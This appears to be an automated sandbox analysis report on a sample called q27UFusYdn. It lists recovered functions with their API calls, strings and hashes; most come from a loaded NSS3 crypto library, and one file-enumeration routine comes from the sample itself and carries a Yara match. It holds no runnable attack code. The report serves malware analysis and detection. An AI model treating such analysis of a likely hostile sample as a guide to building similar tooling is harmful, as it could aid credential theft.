Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008FB

Strings

dbm:, xrefs: 6CE27716
extern:, xrefs: 6CE2772B
NSS Internal Module, xrefs: 6CE274A2, 6CE274C6
dll, xrefs: 6CE2788E
rdb:, xrefs: 6CE27744
,defaultModDB,internalKeySlot, xrefs: 6CE2748D, 6CE274AA
Spac, xrefs: 6CE27389
sql:, xrefs: 6CE276FE
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CE274C7
kbi., xrefs: 6CE27886

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: a8028d1c66b0d316a874f41db98a68f934864a8f5d853f2a58ed71e655d52097
Instruction ID: cddb182f5a977c4b3f96cc7b5fe9760a0346a045d1ab2f1a3a3ccc842732ad95
Opcode Fuzzy Hash: a8028d1c66b0d316a874f41db98a68f934864a8f5d853f2a58ed71e655d52097
Instruction Fuzzy Hash: 7C521FB1E10311DBEF119F64DC05BAA7BB4BF0630CF254028EC59A6B41E779D958CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE74840 Relevance: 65.1, APIs: 29, Strings: 8, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6CE5601B,?,00000000,?), ref: 6CE7486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6CE748A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6CE748BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6CE748DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6CE748F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6CE7490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6CE74919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6CE7493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE74970
PORT_Alloc_Util.NSS3(00000001), ref: 6CE749A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CE749AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE749D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6CE749F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6CE74A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6CE74A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6CE74A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6CE74A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6CE74A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6CE74A81
free.MOZGLUE(00000000), ref: 6CE74AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6CE74ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6CE74ADC
free.MOZGLUE(00000000), ref: 6CE74B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6CE74B33

Part of subcall function 6CE74120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE7413D
Part of subcall function 6CE74120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CE74162
Part of subcall function 6CE74120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE7416B
Part of subcall function 6CE74120: PL_strncasecmp.NSS3(2Bl,?,00000001), ref: 6CE74187
Part of subcall function 6CE74120: NSSUTIL_ArgSkipParameter.NSS3(2Bl), ref: 6CE741A0
Part of subcall function 6CE74120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE741B4
Part of subcall function 6CE74120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6CE741CC
Part of subcall function 6CE74120: NSSUTIL_ArgFetchValue.NSS3(2Bl,?), ref: 6CE74203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6CE74B53
free.MOZGLUE(00000000), ref: 6CE74B94
free.MOZGLUE(?), ref: 6CE74BA7
free.MOZGLUE(00000000), ref: 6CE74BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE74BC8

Strings

timeout, xrefs: 6CE74A38, 6CE74A7B
5s/, xrefs: 6CE7484F
hasRootTrust, xrefs: 6CE74B4D
slotFlags, xrefs: 6CE74A22
hasRootCerts, xrefs: 6CE74AD6
askpw, xrefs: 6CE74A4A
every, xrefs: 6CE74A66
rootFlags, xrefs: 6CE74AB9, 6CE74B2E

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout$5s/
API String ID: 3791087267-2627862837
Opcode ID: 48ee853e8a4de6038fa3ad3f8b87afa94edcace28db3fc9777dcbb1ddb8a0565
Instruction ID: d29681ea4e007c94a405c4f372cba74923a3af6584753122c14b1b9fa0ae1308
Opcode Fuzzy Hash: 48ee853e8a4de6038fa3ad3f8b87afa94edcace28db3fc9777dcbb1ddb8a0565
Instruction Fuzzy Hash: 6CC1E770E452569BEF209F699C40BAA7BB8AF0620CF24002AEC95E7701E7359D15CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE36D90 Relevance: 62.1, APIs: 33, Strings: 2, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6CF3A8EC,0000006C), ref: 6CE36DC6
memcpy.VCRUNTIME140(?,6CF3A958,0000006C), ref: 6CE36DDB
memcpy.VCRUNTIME140(?,6CF3A9C4,00000078), ref: 6CE36DF1
memcpy.VCRUNTIME140(?,6CF3AA3C,0000006C), ref: 6CE36E06
memcpy.VCRUNTIME140(?,6CF3AAA8,00000060), ref: 6CE36E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE36E38

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6CE36E76
TlsGetValue.KERNEL32 ref: 6CE3726F
EnterCriticalSection.KERNEL32(?), ref: 6CE37283

Strings

!, xrefs: 6CE37123
5s/, xrefs: 6CE36D9F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !$5s/
API String ID: 3333340300-2274737619
Opcode ID: f5f7636951286b9898a3bc18281a87774d58145d7b5a4720830a788c8537ad30
Instruction ID: efbfc5da09ff6778cb41df3f08cd5b5de4e52860bac3e128dcca2ecf47574568
Opcode Fuzzy Hash: f5f7636951286b9898a3bc18281a87774d58145d7b5a4720830a788c8537ad30
Instruction Fuzzy Hash: 89729D75D05228DBDF60DF28CC8879ABBB5BF49308F2041A9D80DA7741E735AA85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7AC30 Relevance: 47.8, APIs: 26, Strings: 1, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CE7ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CE7ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CE7ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CE7AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CE7ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE7ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE7ADF0

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE7B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE7B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE7B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE7B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6CE7B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE7B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE7B40C

Strings

5s/, xrefs: 6CE7AC3F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID: 5s/
API String ID: 1285963562-340167759
Opcode ID: 05f6eb71186b77f91f8e06af95545cd6a1d1d791414bb2b2b041eaafb01aba5c
Instruction ID: 0c34567e5f97d2bf11da46d52e8bcf2d5b282a7e89bde248934e623f7b27c281
Opcode Fuzzy Hash: 05f6eb71186b77f91f8e06af95545cd6a1d1d791414bb2b2b041eaafb01aba5c
Instruction Fuzzy Hash: E4227C71A04301AFE720CF24CC45B9A77B1AF8430CF34856CE9595B792E772E859CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6CDB8460 Relevance: 44.8, APIs: 23, Strings: 2, Instructions: 1095COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,00000030), ref: 6CDB84FF
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(377F0682), ref: 6CDB88BB
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002DE218), ref: 6CDB88CE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDB88E2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFFFF), ref: 6CDB88F6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDB894F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDB895F
sqlite3_randomness.NSS3(00000008,?), ref: 6CDB8914

Part of subcall function 6CDA31C0: sqlite3_initialize.NSS3 ref: 6CDA31D6

sqlite3_randomness.NSS3(00000004,?), ref: 6CDB8A13
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDB8A65
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CDB8A6F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDB8B87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CDB8B94
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002E5B33), ref: 6CDB8BAD

Strings

5s/, xrefs: 6CDB8476
cannot limit WAL size: %s, xrefs: 6CDB9188

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_randomness$memcmpsqlite3_initialize
String ID: cannot limit WAL size: %s$5s/
API String ID: 2554290823-4202899018
Opcode ID: c6a9546b14dd9d2bf3b9561e5e43cf7506bd34b3747b8eba89f0406a10636653
Instruction ID: 0ce8f5c35b2e768fe40aa7a1d444257c12fa9832d351f9865d4b7a287753ffbe
Opcode Fuzzy Hash: c6a9546b14dd9d2bf3b9561e5e43cf7506bd34b3747b8eba89f0406a10636653
Instruction Fuzzy Hash: 7E92AFB5A08342DFD704CF29D880A5AB7F1FF88318F18492DE99A97761D734E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE04420 Relevance: 39.7, APIs: 10, Strings: 12, Instructions: 1186stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE04EE3

Strings

non-deterministic use of %s() in %s, xrefs: 6CE04D71, 6CE04EA4
an index, xrefs: 6CE04D53, 6CE04E86
second, xrefs: 6CE04BCA
start of , xrefs: 6CE0517A
a CHECK constraint, xrefs: 6CE04D62, 6CE04D6D, 6CE04E95, 6CE04EA0
5s/, xrefs: 6CE04434
a generated column, xrefs: 6CE04D58, 6CE04E8B
w=l, xrefs: 6CE047FB
40f-21a-21d, xrefs: 6CE044D0
w=l, xrefs: 6CE04431, 6CE04E25, 6CE0533D, 6CE05536, 6CE055A0, 6CE04A83, 6CE04A99, 6CE05313, 6CE05325, 6CE04CFC, 6CE04A8C, 6CE051AC, 6CE048B9, 6CE046CD, 6CE04786, 6CE048D5, 6CE0490D, 6CE05404, 6CE05411, 6CE0541E, 6CE05365, 6CE0537B, 6CE0536E, 6CE0542A, 6CE05466, 6CE053C9, 6CE05211, 6CE04BA1, 6CE05013, 6CE0521D, 6CE04C69, 6CE0528B, 6CE04691, 6CE05058, 6CE04E5E, 6CE04FA4, 6CE04FEB, 6CE04FDF, 6CE04F9D, 6CE04E77, 6CE04EDF, 6CE04576, 6CE04F90
-, xrefs: 6CE04FBA
weekday , xrefs: 6CE054AB

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: strlen
String ID: -$40f-21a-21d$a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$second$start of $w=l$w=l$weekday $5s/
API String ID: 39653677-815232022
Opcode ID: bd6ce0f2a510726a5106b0df4fa04cb3db412df490ef7d004e1439db7d80ac77
Instruction ID: 3556b8d8ae89a662ed599db7ea471241114914142948b37f011bcb4700e421c2
Opcode Fuzzy Hash: bd6ce0f2a510726a5106b0df4fa04cb3db412df490ef7d004e1439db7d80ac77
Instruction Fuzzy Hash: 69A223317087848FC751CF24C0507A6BBF2AF96318F24864EE8D69BB52E735D8A6C781

Uniqueness

Uniqueness Score: -1.00%

Function 6CDFECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CDFED38

Part of subcall function 6CD94F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CD94FC4

sqlite3_mprintf.NSS3(snippet), ref: 6CDFEF3C
sqlite3_mprintf.NSS3(offsets), ref: 6CDFEFE4

Part of subcall function 6CEBDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CD95001,?,00000003,00000000), ref: 6CEBDFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6CDFF087
sqlite3_mprintf.NSS3(matchinfo), ref: 6CDFF129
sqlite3_mprintf.NSS3(optimize), ref: 6CDFF1D1
sqlite3_free.NSS3(?), ref: 6CDFF368

Strings

fts3_tokenizer, xrefs: 6CDFEE1A, 6CDFEEA8
unicode61, xrefs: 6CDFEDB5
matchinfo, xrefs: 6CDFF04F, 6CDFF082, 6CDFF0C2, 6CDFF0F2, 6CDFF124, 6CDFF169
snippet, xrefs: 6CDFEF05, 6CDFEF37, 6CDFEF7C
fts3tokenize, xrefs: 6CDFF30F
fts3, xrefs: 6CDFF247
fts4, xrefs: 6CDFF2AD
optimize, xrefs: 6CDFF199, 6CDFF1CC, 6CDFF211
porter, xrefs: 6CDFED97
simple, xrefs: 6CDFED79
fts4aux, xrefs: 6CDFECF9
offsets, xrefs: 6CDFEFAF, 6CDFEFDF, 6CDFF01F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 38169718c6f557ff5046f429beae73da0a95bd09c32e97e51d95e2d413ab5e10
Instruction ID: 44189e6b35e363ff4034da5871bcf0f6fbad02fe051121fda94dd3743c61a1b9
Opcode Fuzzy Hash: 38169718c6f557ff5046f429beae73da0a95bd09c32e97e51d95e2d413ab5e10
Instruction Fuzzy Hash: AE0212B2B143009BE7049F71A88572B36F27BC5308F19853DD86A87B25EB75E847C792

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3A4D0 Relevance: 33.8, APIs: 13, Strings: 6, Instructions: 501stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(6CE128AD,pkcs11:,00000007), ref: 6CE3A501
PORT_Strdup_Util.NSS3(6CE128AD), ref: 6CE3A514

Part of subcall function 6CE70F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CE12AF5,?,?,?,?,?,6CE10A1B,00000000), ref: 6CE70F1A
Part of subcall function 6CE70F10: malloc.MOZGLUE(00000001), ref: 6CE70F30
Part of subcall function 6CE70F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CE70F42

strchr.VCRUNTIME140(00000000,0000003A), ref: 6CE3A529
PK11_GetInternalKeySlot.NSS3 ref: 6CE3A60D
PR_SetError.NSS3(FFFFE041,00000000), ref: 6CE3A74B
PR_SetError.NSS3(FFFFE041,00000000), ref: 6CE3A777
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE3A80C
memcmp.VCRUNTIME140(?,00000001,00000000), ref: 6CE3A82B
CERT_DestroyCertificate.NSS3(00000000), ref: 6CE3A952
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE3A9C3

Part of subcall function 6CE60960: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,6CE3A8F5,00000000,?,00000010), ref: 6CE6097E
Part of subcall function 6CE60960: memcmp.VCRUNTIME140(?,00000000,6CE3A8F5,00000010), ref: 6CE6098D

free.MOZGLUE(00000000), ref: 6CE3AB18
strchr.VCRUNTIME140(?,00000040), ref: 6CE3AB40
free.MOZGLUE(?), ref: 6CE3ABE1

Part of subcall function 6CE34170: TlsGetValue.KERNEL32(?,6CE128AD,00000000,?,6CE3A793,?,00000000), ref: 6CE3419F
Part of subcall function 6CE34170: EnterCriticalSection.KERNEL32(0000001C), ref: 6CE341AF
Part of subcall function 6CE34170: PR_Unlock.NSS3(?), ref: 6CE341D4

Strings

model, xrefs: 6CE3A8CF
token, xrefs: 6CE3A875
manufacturer, xrefs: 6CE3A8A2
object, xrefs: 6CE3A5CF
5s/, xrefs: 6CE3A4E4
pkcs11:, xrefs: 6CE3A4FB

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: strlen$Errorfreememcmpstrchr$CertificateCriticalDestroyEnterInternalK11_L_strncasecmpSectionSlotStrdup_UnlockUtilValuemallocmemcpy
String ID: manufacturer$model$object$pkcs11:$token$5s/
API String ID: 916065474-4205386313
Opcode ID: 085755e68c5f942d74708dda78b965d623a8540e206975537d6af01f8475c447
Instruction ID: b1abfde1bee34e96c865575ef4f85f51c0dbf1da08265b65a2a03cca36333047
Opcode Fuzzy Hash: 085755e68c5f942d74708dda78b965d623a8540e206975537d6af01f8475c447
Instruction Fuzzy Hash: BC02AAB5D402349FFF215B71AC41BAA7675AF0130CF2450A8D80CA6712FB35AE99CF92

Uniqueness

Uniqueness Score: -1.00%

Function 004121F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
HeapAlloc.KERNEL32(00000000), ref: 00412207
wsprintfA.USER32 ref: 00412223
FindFirstFileA.KERNEL32(?,?), ref: 0041223A
StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
FindClose.KERNEL32(000000FF), ref: 00412314
lstrcat.KERNEL32(?,041434A0), ref: 00412339
lstrcat.KERNEL32(?,04147F58), ref: 0041234C
lstrlen.KERNEL32(?), ref: 00412359
lstrlen.KERNEL32(?), ref: 0041236A

Strings

%s\%s, xrefs: 00412295
%s\*, xrefs: 00412217

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 92269801ec56706d49fbc1ad71996fa168eab42beab98886f9fc838609930503
Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
Opcode Fuzzy Hash: 92269801ec56706d49fbc1ad71996fa168eab42beab98886f9fc838609930503
Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7EFF0 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CE7C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CE7DAE2,?), ref: 6CE7C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE7F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE7F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6CE7F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE7F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CF4218C), ref: 6CE7F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6CE7F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE7F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CE7F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CE7F210

